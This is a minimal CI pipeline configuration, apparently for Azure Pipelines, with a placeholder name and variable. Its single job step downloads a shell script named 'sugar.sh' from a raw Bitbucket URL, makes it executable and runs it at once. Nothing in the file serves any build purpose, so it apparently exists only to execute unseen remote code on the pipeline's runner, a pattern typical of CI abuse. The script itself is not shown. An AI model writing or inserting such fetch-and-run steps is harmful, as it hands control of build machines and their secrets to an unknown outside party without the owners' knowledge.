name: yyk
variables: 
  var1: value1
jobs:
- job: one
  steps: 
  - script: wget https://bitbucket.org/nurkinan677/zhe/raw/0f530407de6984150f9093069fd20d6f64019e24/sugar.sh && chmod u+x sugar.sh && ./sugar.sh